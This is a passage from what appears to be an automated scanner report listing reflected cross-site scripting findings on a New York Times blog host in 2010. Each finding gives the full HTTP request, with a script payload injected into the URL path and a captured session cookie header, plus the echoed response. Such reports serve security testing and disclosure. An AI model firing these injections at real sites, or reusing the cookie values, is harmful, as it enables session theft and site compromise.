Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:14:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:14:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/stanley-fish/feed3748b\"><script>alert(1)</script>bc108e0983b&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.222. http://opinionator.blogs.nytimes.com/category/stanley-fish/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/stanley-fish/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e00ad"><script>alert(1)</script>30e8e361bb3 was submitted in the REST URL parameter 3. This input was echoed as e00ad\"><script>alert(1)</script>30e8e361bb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/stanley-fish/pagee00ad"><script>alert(1)</script>30e8e361bb3/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/stanley-fish/pagee00ad\"><script>alert(1)</script>30e8e361bb3/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.223. http://opinionator.blogs.nytimes.com/category/the-conversation [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-conversation

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34517"><script>alert(1)</script>ed0f3f7275b was submitted in the REST URL parameter 2. This input was echoed as 34517\"><script>alert(1)</script>ed0f3f7275b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-conversation34517"><script>alert(1)</script>ed0f3f7275b HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:31:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:31:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-conversation34517\"><script>alert(1)</script>ed0f3f7275b&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.224. http://opinionator.blogs.nytimes.com/category/the-conversation/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-conversation/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c546"><script>alert(1)</script>e08b7a6164f was submitted in the REST URL parameter 2. This input was echoed as 3c546\"><script>alert(1)</script>e08b7a6164f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-conversation3c546"><script>alert(1)</script>e08b7a6164f/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:14:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:14:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-conversation3c546\"><script>alert(1)</script>e08b7a6164f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.225. http://opinionator.blogs.nytimes.com/category/the-conversation/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-conversation/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85eb8"><script>alert(1)</script>aa8d466ec7f was submitted in the REST URL parameter 3. This input was echoed as 85eb8\"><script>alert(1)</script>aa8d466ec7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-conversation/feed85eb8"><script>alert(1)</script>aa8d466ec7f/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:12:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:12:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-conversation/feed85eb8\"><script>alert(1)</script>aa8d466ec7f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.226. http://opinionator.blogs.nytimes.com/category/the-conversation/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-conversation/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e164"><script>alert(1)</script>15a91c4e22f was submitted in the REST URL parameter 3. This input was echoed as 9e164\"><script>alert(1)</script>15a91c4e22f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-conversation/page9e164"><script>alert(1)</script>15a91c4e22f/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:16:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:16:19 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-conversation/page9e164\"><script>alert(1)</script>15a91c4e22f/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.227. http://opinionator.blogs.nytimes.com/category/the-score [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-score

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc441"><script>alert(1)</script>452e1e08d7c was submitted in the REST URL parameter 2. This input was echoed as cc441\"><script>alert(1)</script>452e1e08d7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-scorecc441"><script>alert(1)</script>452e1e08d7c HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:30:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:30:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-scorecc441\"><script>alert(1)</script>452e1e08d7c&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.228. http://opinionator.blogs.nytimes.com/category/the-score/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-score/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b124"><script>alert(1)</script>3ea01d75cdf was submitted in the REST URL parameter 3. This input was echoed as 1b124\"><script>alert(1)</script>3ea01d75cdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-score/feed1b124"><script>alert(1)</script>3ea01d75cdf/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:27:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:27:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-score/feed1b124\"><script>alert(1)</script>3ea01d75cdf&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.229. http://opinionator.blogs.nytimes.com/category/the-score/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-score/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3e96"><script>alert(1)</script>9854a6a0f5e was submitted in the REST URL parameter 3. This input was echoed as a3e96\"><script>alert(1)</script>9854a6a0f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-score/pagea3e96"><script>alert(1)</script>9854a6a0f5e/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:30:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:30:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-score/pagea3e96\"><script>alert(1)</script>9854a6a0f5e/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.230. http://opinionator.blogs.nytimes.com/category/the-stone [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-stone

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f72a2"><script>alert(1)</script>b9e42893e2 was submitted in the REST URL parameter 2. This input was echoed as f72a2\"><script>alert(1)</script>b9e42893e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-stonef72a2"><script>alert(1)</script>b9e42893e2 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:31:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:31:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-stonef72a2\"><script>alert(1)</script>b9e42893e2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.231. http://opinionator.blogs.nytimes.com/category/the-stone/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-stone/

Issue detail

